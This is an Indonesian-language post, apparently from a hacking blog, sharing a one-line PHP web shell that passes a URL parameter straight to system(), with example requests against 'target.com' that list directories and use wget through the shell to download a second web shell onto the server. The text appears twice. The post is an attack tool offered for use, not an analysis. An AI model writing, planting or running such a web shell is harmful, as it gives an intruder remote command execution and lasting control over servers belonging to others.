Ikut2an om DNZ nih bikin artikel tentang simple shell.
tapi kali ini simple shell command, biasa dipakai di server linux
Berikut code Simple Shell Command
lalu panggil dengan cara:
http://target.com/tes.php?cmd=dir
dir = command untuk melihat isi directory
kalau mau upload shell tinggal pakai perintah wget lokasi shell.
http://target.com/tes.php?cmd=wget http://target.com/shell.php
dah ya semoga bermanfaat
salam
anharku
Berikut code Simple Shell Command
- <?php
- echo '<pre>';system($_GET['cmd']);echo '</pre>';
- ?>
lalu panggil dengan cara:
http://target.com/tes.php?cmd=dir
dir = command untuk melihat isi directory
kalau mau upload shell tinggal pakai perintah wget lokasi shell.
http://target.com/tes.php?cmd=wget http://target.com/shell.php
dah ya semoga bermanfaat
salam
anharku